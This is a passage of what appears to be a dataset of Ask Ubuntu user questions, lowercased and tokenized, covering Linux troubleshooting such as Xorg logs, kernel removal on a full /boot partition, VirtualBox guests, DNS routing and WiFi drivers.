) ( using edid frequencies has been [ 30.475 ] ( ** ) nvidia ( 0 ) : enabled on all display devices . ) [ 30.659 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 30.743 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung ( dfp-1 ) ) does not support nvidia 3d vision [ 30.743 ] ( ii ) nvidia ( gpu-0 ) : stereo . [ 30.743 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 30.743 ] ( ** ) nvidia ( 0 ) : device samsung ( dfp-1 ) ( using edid frequencies has been [ 30.743 ] ( ** ) nvidia ( 0 ) : enabled on all display devices . ) [ 31.261 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung ( dfp-1 ) ) does not support nvidia 3d vision [ 31.261 ] ( ii ) nvidia ( gpu-0 ) : stereo . [ 31.261 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 31.261 ] ( ** ) nvidia ( 0 ) : device samsung ( dfp-1 ) ( using edid frequencies has been [ 31.261 ] ( ** ) nvidia ( 0 ) : enabled on all display devices . ) [ 33.024 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b8cd4fe5a1833d7ab4b402792017a55b628fcf2d.xkm [ 33.032 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b8cd4fe5a1833d7ab4b402792017a55b628fcf2d.xkm [ 33.172 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung ( dfp-1 ) ) does not support nvidia 3d vision [ 33.172 ] ( ii ) nvidia ( gpu-0 ) : stereo . [ 33.172 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 33.172 ] ( ** ) nvidia ( 0 ) : device samsung ( dfp-1 ) ( using edid frequencies has been [ 33.172 ] ( ** ) nvidia ( 0 ) : enabled on all display devices . ) [ 34.933 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-07844d531afae8c05ad2de44539ca82502952248.xkm [ 53.638 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung ( dfp-1 ) ) does not support nvidia 3d vision [ 53.638 ] ( ii ) nvidia ( gpu-0 ) : stereo . [ 53.638 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 53.638 ] ( ** ) nvidia ( 0 ) : device samsung ( dfp-1 ) ( using edid frequencies has been [ 53.638 ] ( ** ) nvidia ( 0 ) : enabled on all display devices . ) [ 1274.427 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung ( dfp-1 ) ) does not support nvidia 3d vision [ 1274.427 ] ( ii ) nvidia ( gpu-0 ) : stereo . [ 1274.427 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 1274.427 ] ( ** ) nvidia ( 0 ) : device samsung ( dfp-1 ) ( using edid frequencies has been [ 1274.427 ] ( ** ) nvidia ( 0 ) : enabled on all display devices . ) [ 3884.333 ] ( ii ) evdev : logitech usb receiver : close [ 3884.333 ] ( ii ) unloadmodule : `` evdev '' [ 3884.333 ] ( ii ) evdev : logitech usb receiver : close [ 3884.333 ] ( ii ) unloadmodule : `` evdev '' [ 3884.333 ] ( ii ) evdev : pulse-eight usb-cec adapter : close [ 3884.333 ] ( ii ) unloadmodule : `` evdev '' [ 3884.333 ] ( ii ) evdev : power button : close [ 3884.333 ] ( ii ) unloadmodule : `` evdev '' [ 3884.333 ] ( ii ) evdev : power button : close [ 3884.333 ] ( ii ) unloadmodule : `` evdev '' [ 3884.688 ] ( ee ) server terminated successfully ( 0 ) . closing log file . as i said looking for any thoughts on how to progress . thanks .
419065	program installation problems on windows guest	i am using virtual box 4.3.6 r91406 on my ubuntu 12.04 . i have installed windows 7 ultimate and red hat enterprise linux as the guest operating systems . i have also installed the virtual box guest additions on windows 7 guest and have also configured my desired shared folder . i am able to access all the files but ca n't run or install any program on windows guest as i am always greeted with the error : '' the specified path does not exist . check the path , and then try again. `` please help ! urgent .
419070	ca n't open advanced setting	hello every one i 've just installed gnome-tweak-tool by using this code sudo apt-get install gnome-tweak-tool after installing the advanced setting icon appear in applications menu and when i tray to open it it seems that ubuntu opening it ( from the top panel in gnome ) but nothing happen . when i check out the problem in terminal i get this message : ( gnome-tweak-tool:4972 ) : glib-gio-error ** : settings schema 'org.gnome.shell.extensions.user-theme ' is not installed trace/breakpoint trap ( core dumped ) i 'm very thankful for anyone who help .
419073	how to install zte mf 100 donge or huawei e173 in ubuntu 12.04	how to install zte mf 100 donge or huawei e173 in ubuntu 12.04.plz teach me ... im in big trouble
419077	l2tp , ps3mediaserver	what im trying to do here are to connect to an ps3 mediaserver , thats located remotely behind an vpn . this is how my network looks like ps3 mediaserver : ip : 10.0.0.116 playstation 3 : ip 192.168.1.116 i 'm connecting to the remote network , using an drytek vigor 2920n . site to site ( lan to lan ) . the issue here , arent that i cant connect to the ps3 media server . the issue are that the playstation 3 , does not se the ps3 media server on the `` vpn network '' since its on an other ip range . it looks like the play station is only looking for media servers on its own network range . i can ping 10.0.0.116 , connect to it using ssh from an other computer on the 192.168.1.0/24 network . so my questions are : how can i masquerade the 10.0.0.116 ip as 192.168.1 . * on my local network . or if anyone know how i can get the ps3 to look for media servers on other network ranges , that would be an equally good solution for me .
419082	installing phpmyadmin in another port	i have a vps where i host different websites , not only in apache but other platforms like ruby on rails . to set this up , i use nginx as front-end webserver , as proxy . i have apache running in port 8080 . now i wanted to install phpmyadmin , so i did sudo apt-get install phpmyadmin but i get nothing when i access either http : // < myserverip > /phpmyadmin or http : // < myserverip > :80/phpmyadmin how could i solve this problem ?
419084	what is info @ wlcfg_80211_attach message while booting ?	my laptop boot time seems to be delayed by this message . i have a broadcom internal wlan card installed on the laptop and a desktop without a wireless device . the desktop boots much faster , even though it 's older than the laptop .
419086	open a terminal a run a program on it automatically when the session starts	i have a script to open a terminal and run a command on it : # ! /bin/bash export display=:0.0 /usr/bin/gnome-terminal -e '/home/me/bin/application -- option a -- option b -- debug' however , the gnome-terminal appears in a blink and then this disappears when the script is executed for the startup application service . i want to leave this terminal open because this gives basic information in the debugging mode . when i run this basic script in a terminal , all is fine . this only fails as this is executed for the startup application service . any suggestions ? update ok , i edited the profile preference in gnome-terminal not to close the terminal , once the program has been executed ( profile preferences- > title and commands - > in when command exits- > hold the terminal open ) . i could read a message in the terminal that says during the execution of the script has n't been found certain python libraries . by the way , the program that i want to run is a python script . obviously , at the beginning of the python script , i put : # ! /usr/bin/env python even so , it is not working . i usually put certain environmental variables in the ~/.bashrc script to be called when a gnome-terminal is open . how can i source the ~/.bashrc script using /bin/sh ?
419089	canâ´t install xampp on ubuntu 13.10	i 'm trying to install xampp but those errors appeared when i followed some of the steps shown in other posts . how can i fix this ?
419095	unable to remove old kernels	i 'm trying to remove old kernel versions so i can upgrade . the method i 'm using is below . sudo apt-get purge linux-image-x.y.z-server every time i run it i get the following error : < ( reading database ... 516009 files and directories currently installed . ) unpacking linux-image-3.0.0-32-server ( from ... /linux-image-3.0.0-32-server_3.0.0-32.51_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.0.0-32-server_3.0.0-32.51_amd64.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./boot/system.map-3.0.0-32-server ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.0.0-32-server /boot/vmlinuz-3.0.0-32-server run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.0.0-32-server /boot/vmlinuz-3.0.0-32-server errors were encountered while processing : /var/cache/apt/archives/linux-image-3.0.0-32-server_3.0.0-32.51_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ok , so what i get is this is telling me i 'm out of space which i know . i also get a message from time to time about running the below to resolve my errors at which point i get the now space message again . sudo apt-get install -f everything i try give me the now space error . frustrating ... .. thanks for the help folks . here is the output requested , sorry /dev/mapper/wikisrvr-root 48g 6.4g 40g 14 % / udev 996m 4.0k 996m 1 % /dev tmpfs 402m 952k 401m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1005m 188k 1004m 1 % /run/shm /dev/sda1 228m 227m 0 100 % /boot this is the error i get when trying to purge as per the posted link . btw that was the orgions post i tried to follow . build @ wikisrvr : ~ $ sudo apt-get purge linux-image-3.0.0-12-server [ sudo ] password for build : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-image-server : depends : linux-image-3.0.0-32-server but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . resultz from sudo apt-get -f install build @ wikisrvr : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.0.0-26-generic linux-headers-3.0.0-20-server linux-headers-3.0.0-24-server linux-headers-3.0.0-19-server ubufox linux-headers-3.0.0-12 linux-headers-3.0.0-20 linux-headers-3.0.0-21 linux-headers-3.0.0-16 linux-headers-3.0.0-22 linux-headers-3.0.0-17 linux-headers-3.0.0-24 linux-headers-3.0.0-19 linux-headers-3.0.0-30 linux-headers-3.0.0-25 linux-headers-3.0.0-26 linux-headers-3.0.0-21-generic linux-headers-3.0.0-16-generic linux-headers-3.0.0-12-server linux-headers-3.0.0-24-generic linux-headers-3.0.0-19-generic linux-headers-3.0.0-21-server linux-headers-3.0.0-30-server linux-headers-3.0.0-25-server linux-headers-3.0.0-22-generic linux-headers-3.0.0-17-generic linux-headers-3.0.0-22-server linux-headers-3.0.0-17-server linux-headers-3.0.0-30-generic linux-headers-3.0.0-25-generic linux-headers-3.0.0-26-server linux-headers-3.0.0-20-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-image-3.0.0-32-server suggested packages : fdutils linux-doc-3.0.0 linux-source-3.0.0 linux-tools the following new packages will be installed : linux-image-3.0.0-32-server 0 upgraded , 1 newly installed , 0 to remove and 127 not upgraded . 12 not fully installed or removed . need to get 0 b/37.3 mb of archives . after this operation , 150 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 516009 files and directories currently installed . ) unpacking linux-image-3.0.0-32-server ( from ... /linux-image-3.0.0-32-server_3.0.0-32.51_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.0.0-32-server_3.0.0-32.51_amd64.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./boot/system.map-3.0.0-32-server ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.0.0-32-server /boot/vmlinuz-3.0.0-32-server run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.0.0-32-server /boot/vmlinuz-3.0.0-32-server errors were encountered while processing : /var/cache/apt/archives/linux-image-3.0.0-32-server_3.0.0-32.51_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) results from sugo apt-get autoremove build @ wikisrvr : ~ $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-image-server : depends : linux-image-3.0.0-32-server but it is not installed e : unmet dependencies . try using -f. results from sudo apt-get autoremove -f build @ wikisrvr : ~ $ sudo apt-get autoremove -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-image-3.0.0-32-server suggested packages : fdutils linux-doc-3.0.0 linux-source-3.0.0 linux-tools the following packages will be removed : linux-headers-3.0.0-12 linux-headers-3.0.0-12-server linux-headers-3.0.0-16 linux-headers-3.0.0-16-generic linux-headers-3.0.0-17 linux-headers-3.0.0-17-generic linux-headers-3.0.0-17-server linux-headers-3.0.0-19 linux-headers-3.0.0-19-generic linux-headers-3.0.0-19-server linux-headers-3.0.0-20 linux-headers-3.0.0-20-generic linux-headers-3.0.0-20-server linux-headers-3.0.0-21 linux-headers-3.0.0-21-generic linux-headers-3.0.0-21-server linux-headers-3.0.0-22 linux-headers-3.0.0-22-generic linux-headers-3.0.0-22-server linux-headers-3.0.0-24 linux-headers-3.0.0-24-generic linux-headers-3.0.0-24-server linux-headers-3.0.0-25 linux-headers-3.0.0-25-generic linux-headers-3.0.0-25-server linux-headers-3.0.0-26 linux-headers-3.0.0-26-generic linux-headers-3.0.0-26-server linux-headers-3.0.0-30 linux-headers-3.0.0-30-generic linux-headers-3.0.0-30-server ubufox the following new packages will be installed : linux-image-3.0.0-32-server 0 upgraded , 1 newly installed , 32 to remove and 127 not upgraded . 12 not fully installed or removed . need to get 0 b/37.3 mb of archives . after this operation , 1,029 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 516009 files and directories currently installed . ) unpacking linux-image-3.0.0-32-server ( from ... /linux-image-3.0.0-32-server_3.0.0-32.51_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.0.0-32-server_3.0.0-32.51_amd64.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./boot/system.map-3.0.0-32-server ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.0.0-32-server /boot/vmlinuz-3.0.0-32-server run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.0.0-32-server /boot/vmlinuz-3.0.0-32-server errors were encountered while processing : /var/cache/apt/archives/linux-image-3.0.0-32-server_3.0.0-32.51_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
419099	how to use custom dns server for selected domains only ?	there are quite few nice dns service providers that do region unblocking and advertisement blocking . but i 'm not too fond of sharing all my dns queries with them . how i can use their dns services only for manually selected domains ?
419103	i want to boot ubuntu from a old pc internal hdd with usb adapter	i have an hdd with ubuntu from my old , broke notebook , i have a hdd2usb adapter and i need to boot it from this external hdd . if i take of the win8 hdd and place the ubuntu 's one , all work 's fine , but ubuntu and win8 do n't boot from external hdd . what i do wrong ! ? thanks !
419104	two problems with emacs and latex	the first problem is that when ( in auctex mode ) i click the `` view dvi '' in emacs , xdvi appears for a millisecond and then disappears . does n't happen for files that are just a few pages long . when i open the dvi file with xdvi outside emacs , there is no problem at all . happens for both emacs 23 and 24 . this problem started when i upgraded from ubuntu 13.04 to ubuntu 13.10 . i do n't know what to do . emacs does n't give any messages related to this . ( i ca n't use pdftex in general because i use xfig images with `` embedded '' tex . ) the second problem is simply that in the auctex mode the toolbar buttons are accompanied by their text description ( even the separator ! ) . i played quite a bit with the options but could n't fix it .
419105	c++ programme compiled successfully but unable to run	i compiled the program using gpp it was done successfully but when i tried to run the program i got these errors : - i have included using namespace std ; in 3'rd line harish @ harish-lenovo-g580 : ~ $ gpp iget.cpp -o abc harish @ harish-lenovo-g580 : ~ $ gpp -o abc iget.cpp harish @ harish-lenovo-g580 : ~ $ ./abc ./abc : line 3 : using : command not found ./abc : line 5 : struct : command not found ./abc : line 14 : syntax error near unexpected token ` ( ' ./abc : line 14 : `void getno ( ) '
419106	getting `` input not supported '' and ca n't enter password at password page	new user loaded ubuntu 12.04 on windows 7 as a dual boot using wubi . at boot up selected ubuntu with no problem . screen change and received a moving outline with `` input not supported '' . i have a logitech wireless keyboard and mouse mk710 is that the problem ? whats a fix if so . i get to the password page but ca n't sign in .
419112	how do i transcode some web video streams on the fly	i am not even sure how to ask this exactly so i 'll try to explain in the best possible way . i want to turn a pc of mine in a transcoder + video broadcast server . the content is already out there on the web ( it is in fact several tv channel that offer their programme freely online too ) , but i seem to have to have problem playing some of their streams in the videoplayer of an application that i am developing . while my application does have problem to play some of these streams , totem and other linux video players do not have a problem with any of them . so that rules out the possibility of some web-stream-format error on the tv broadcaster 's web facilities . since i need , for a personal project , to get the other streams working as well , i thought of transcoding on the fly the streamed content from the tv channels in a server of my own and broadcasting in a unified format that the video player of my application can understand and show . the question is what application or set of applications can do that ? do you have a guide to suggest ?
419114	eccn/export classification for ubuntu server 12.0 . lts	to whom it may concern , our company has a server with ubuntu server 12.0 . lts installed . i am trying to find out the u.s. eccn number and if it is restricted for export for this ubuntu product . any help would be much appreciated . kind regards , d. swiger
419115	make bluetooth disabled by default	each time i open ubuntu i have to turnoff bluetooth function from the top panel . my questions is that is there any method to make it disabled by default ?
419116	how to remove latest kernel without removing linux itself	i have found my machine to be unstable with 3.2.0-58 . since starting to run 3.2.0-57 my machine has been much more stable , and i would like to remove 3.2.0.58 from my machine , partly so that i boot into 3.2.0-57 by default , and partly to keep things tidy . i followed the advice in this answer and searched for 3.2.0-58 in synaptic , selected the 4 modules that were found , right clicked and chose mark for removal and got this dialog it looks like by removing 3.2.0-58 i 'll remove linux itself ! this is n't a good idea is it ? i 'm not running 3.2.0-58 $ uname -r 3.2.0-57-generic how should i remove the latest kernel ? or is it too difficult / risky ? ( apologies if this is a duplicate , i did search but the posts i found were to do with removing old kernels . )
419117	xubuntu : how to remove the printer icon ?	i 'm on xubuntu 13.10 64 bit , i printed something , now the printer icon is still up there next to the battery icon , i solve the problem by logging out and in . but i want a better solution for next time that does not require me to log out . edit : i 'm having the same problem . as requested , here is a screenshot : when i try to click ( left or right ) on the printer icon , nothing happens . only logging out and back in again clears it away .
419121	launcher search is showing duplicate icon	i also have duplicates in my dash ( saw several questions about this subject ) . but i do n't know which one i need to remove . i went to : /usr/share/applications with grep i do get the following : / $ grep -r 'startup applications ' /usr/share/applications $ home/.local/share/applications /usr/share/applications/cinnamon-session-properties.desktop : name=startup applications /usr/share/applications/session-properties.desktop : name=startup applications is there anyone who know how i can remove the second `` startup applications '' ?
419122	why upstart documentation prevents me from using respawn	in documentation i found a note that i should n't use respawn if i satisfied with expect . but i can not understand , how are they interfere . for example , nginx config using both and predictable did n't respawn if i disable the respawn stanza . so , what `` confusing behaviour '' should i expect ?
419124	f550vb with ubuntu 13.10 , wifi problems	i 'm not an expert on linux , i would rather call me an armature . i have an asus f550vb laptop . i installed ubuntu but the wifi is n't working either with my asus usb n-13 network adapter . edit : some information lsmod module size used by usb_storage 62062 1 parport_pc 32701 0 ppdev 17671 0 rfcomm 69070 12 bnep 19564 2 nls_iso8859_1 12713 1 snd_hda_codec_hdmi 41276 1 snd_hda_codec_realtek 51465 1 x86_pkg_temp_thermal 14162 0 intel_powerclamp 14705 0 coretemp 13435 0 kvm_intel 138538 0 kvm 431315 1 kvm_intel crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 ghash_clmulni_intel 13259 0 aesni_intel 55624 0 aes_x86_64 17131 1 aesni_intel lrw 13257 1 aesni_intel gf128mul 14951 1 lrw glue_helper 13990 1 aesni_intel ablk_helper 13597 1 aesni_intel cryptd 20329 3 ghash_clmulni_intel , aesni_intel , ablk_helper asus_nb_wmi 16990 0 asus_wmi 24191 1 asus_nb_wmi sparse_keymap 13948 1 asus_wmi uvcvideo 80885 0 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40469 1 uvcvideo videodev 133390 2 uvcvideo , videobuf2_core joydev 17377 0 snd_hda_intel 48171 3 snd_hda_codec 188738 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec snd_pcm 102033 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30095 1 snd_seq_midi snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi arc4 12608 2 ath9k 151173 0 ath9k_common 13859 1 ath9k ath9k_hw 444645 2 ath9k_common , ath9k microcode 23518 0 ath 23827 3 ath9k_common , ath9k , ath9k_hw mac80211 596969 1 ath9k psmouse 97626 0 ath3k 13318 0 serio_raw 13413 0 btusb 28267 0 bluetooth 371874 23 bnep , ath3k , btusb , rfcomm rtsx_pci_ms 18151 0 snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29433 2 snd_pcm , snd_seq memstick 16760 1 rtsx_pci_ms snd 69141 17 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi cfg80211 479757 3 ath , ath9k , mac80211 nouveau 943295 0 lpc_ich 21080 0 i915 655752 3 soundcore 12680 1 snd mei_me 18421 0 mei 77692 1 mei_me mxm_wmi 13021 1 nouveau ttm 83995 1 nouveau drm_kms_helper 52651 2 i915 , nouveau drm 296739 6 ttm , i915 , drm_kms_helper , nouveau i2c_algo_bit 13413 2 i915 , nouveau wmi 19070 3 mxm_wmi , nouveau , asus_wmi video 19318 3 i915 , nouveau , asus_wmi mac_hid 13205 0 lp 17759 0 parport 42299 3 lp , ppdev , parport_pc hid_generic 12548 0 usbhid 53014 0 hid 101512 2 hid_generic , usbhid rtsx_pci_sdmmc 23527 0 r8169 67341 0 mii 13934 1 r8169 rtsx_pci 45546 2 rtsx_pci_ms , rtsx_pci_sdmmc ahci 25819 4 libahci 31898 1 ahci rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no 2 : asus-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : no hard blocked : no sudo lshw product : x550vb vendor : asustek computer inc. physical id : 0 version : 1.0 serial : bsn12345678901234567 slot : middle *-firmware description : bios vendor : american megatrends inc. physical id : 0 version : x550vb.210 date : 05/20/2013 size : 64kib capacity : 6080kib capabilities : pci upgrade shadowing cdboot bootselect socketedrom edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer acpi usb smartbattery biosbootspecification uefi *-cache:0 description : l2 cache physical id : 8 slot : cpu internal l2 size : 512kib capacity : 512kib capabilities : internal write-through unified *-cache:1 description : l1 cache physical id : 9 slot : cpu internal l1 size : 128kib capacity : 128kib capabilities : internal write-through data *-cache:2 description : l3 cache physical id : a slot : cpu internal l3 size : 3mib capacity : 3mib capabilities : internal write-back unified *-memory description : system memory physical id : b slot : system board or motherboard size : 8gib *-bank:0 description : sodimm ddr3 synchronous 1600 mhz ( 0,6 ns ) product : ebj40ug8efu0 vendor : elpida physical id : 0 serial : 00000000 slot : channela-dimm0 size : 4gib width : 64 bits clock : 1600mhz ( 0.6ns ) *-bank:1 description : dimm [ empty ] product : [ empty ] vendor : [ empty ] physical id : 1 serial : [ empty ] slot : channela-dimm1 *-bank:2 description : sodimm ddr3 synchronous 1600 mhz ( 0,6 ns ) product : m471b5273ch0-yk0 vendor : samsung physical id : 2 serial : d151e732 slot : channelb-dimm0 size : 4gib width : 64 bits clock : 1600mhz ( 0.6ns ) *-bank:3 description : dimm [ empty ] product : [ empty ] vendor : [ empty ] physical id : 3 serial : [ empty ] slot : channelb-dimm1 *-cpu description : cpu product : intel ( r ) core ( tm ) i5-3230m cpu @ 2.60ghz vendor : intel corp. physical id : c bus info : cpu @ 0 version : intel ( r ) core ( tm ) i5-3230m cpu @ 2.60ghz slot : socket 0 size : 1200mhz capacity : 3800mhz width : 64 bits clock : 100mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf eagerfpu pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid fsgsbase smep erms cpufreq configuration : cores=2 enabledcores=2 threads=4 *-pci description : host bridge product : 3rd gen core processor dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 09 width : 32 bits clock : 33mhz *-pci:0 description : pci bridge product : xeon e3-1200 v2/3rd gen core processor pci express root port vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 09 width : 32 bits clock : 33mhz capabilities : pci pm msi pciexpress normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:42 ioport : e000 ( size=4096 ) memory : f6000000-f70fffff ioport : e0000000 ( size=301989888 ) *-display unclaimed description : 3d controller product : gk208m [ geforce gt 740m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress cap_list configuration : latency=0 resources : memory : f6000000-f6ffffff memory : e0000000-efffffff memory : f0000000-f1ffffff ioport : e000 ( size=128 ) memory : f7000000-f707ffff *-display description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:48 memory : f7400000-f77fffff memory : d0000000-dfffffff ioport : f000 ( size=64 ) *-usb:0 description : usb controller product : 7 series/c210 series chipset family usb xhci host controller vendor : intel corporation physical id : 14 bus info : pci @ 0000:00:14.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi xhci bus_master cap_list configuration : driver=xhci_hcd latency=0 resources : irq:43 memory : f7a00000-f7a0ffff *-communication description : communication controller product : 7 series/c210 series chipset family mei controller # 1 vendor : intel corporation physical id : 16 bus info : pci @ 0000:00:16.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : driver=mei_me latency=0 resources : irq:47 memory : f7a1a000-f7a1a00f *-usb:1 description : usb controller product : 7 series/c210 series chipset family usb enhanced host controller # 2 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 04 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:16 memory : f7a18000-f7a183ff *-multimedia description : audio device product : 7 series/c210 series chipset family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:49 memory : f7a10000-f7a13fff *-pci:1 description : pci bridge product : 7 series/c210 series chipset family pci express root port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : c4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 *-pci:2 description : pci bridge product : 7 series/c210 series chipset family pci express root port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : c4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:17 memory : f7900000-f79fffff *-network disabled description : wireless interface product : ar9485 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan1 version : 01 serial : 24:0a:64:50 : d8:67 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.11.0-12-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : f7900000-f797ffff memory : f7980000-f798ffff *-pci:3 description : pci bridge product : 7 series/c210 series chipset family pci express root port 4 vendor : intel corporation physical id : 1c.3 bus info : pci @ 0000:00:1c.3 version : c4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:19 ioport : d000 ( size=4096 ) memory : f7800000-f78fffff ioport : f2100000 ( size=1048576 ) *-generic description : unassigned class product : realtek semiconductor co. , ltd. vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list configuration : driver=rtsx_pci latency=0 resources : irq:44 memory : f7800000-f780ffff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0.2 bus info : pci @ 0000:04:00.2 logical name : eth0 version : 0a serial : ac:22:0b : a9 : f7 : d6 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8411-1_0.0.3 06/18/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:46 ioport : d000 ( size=256 ) memory : f2104000-f2104fff memory : f2100000-f2103fff *-usb:2 description : usb controller product : 7 series/c210 series chipset family usb enhanced host controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 04 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:23 memory : f7a17000-f7a173ff *-isa description : isa bridge product : hm76 express chipset lpc controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 04 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : driver=lpc_ich latency=0 resources : irq:0 *-storage description : sata controller product : 7 series chipset family 6-port sata controller [ ahci mode ] vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 version : 04 width : 32 bits clock : 